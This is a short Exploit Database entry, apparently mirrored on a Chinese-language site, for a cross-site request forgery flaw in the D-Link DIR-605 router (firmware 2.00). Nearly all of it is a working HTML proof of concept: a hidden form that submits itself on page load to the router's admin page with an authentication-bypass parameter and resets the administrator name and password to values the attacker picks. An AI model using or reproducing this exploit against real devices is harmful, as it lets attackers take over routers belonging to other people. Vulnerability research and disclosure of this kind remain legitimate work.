D-Link DIR-605 – Cross-Site Request Forgery

• Exploit Database
• 57 阅读

• 作者： iqzer0
  日期： 2012-03-21
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18638/

• # Exploit Title: D-Link DIR-605 CSRF Vulnerability
  # Date: 20-03-2012
  # Author: iqzer0++
  # Version: Firmware Version : 2.00
  # Tested on: DIR-605
  
  This allows unauthroized access to the device and post injections
  
  <html>
  <form name="bypass" action="
  http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
  method="post">
   <input type="hidden" name="ACTION_POST" value="1" />
  <input type="hidden" name="admin_name" value="iqzer0" />
  <input type="hidden" name="admin_password1" value="bypass" />
  <input type="hidden" name="admin_password2" value="bypass" />
  </form>
  <script>document.bypass.submit();</script>
  </html>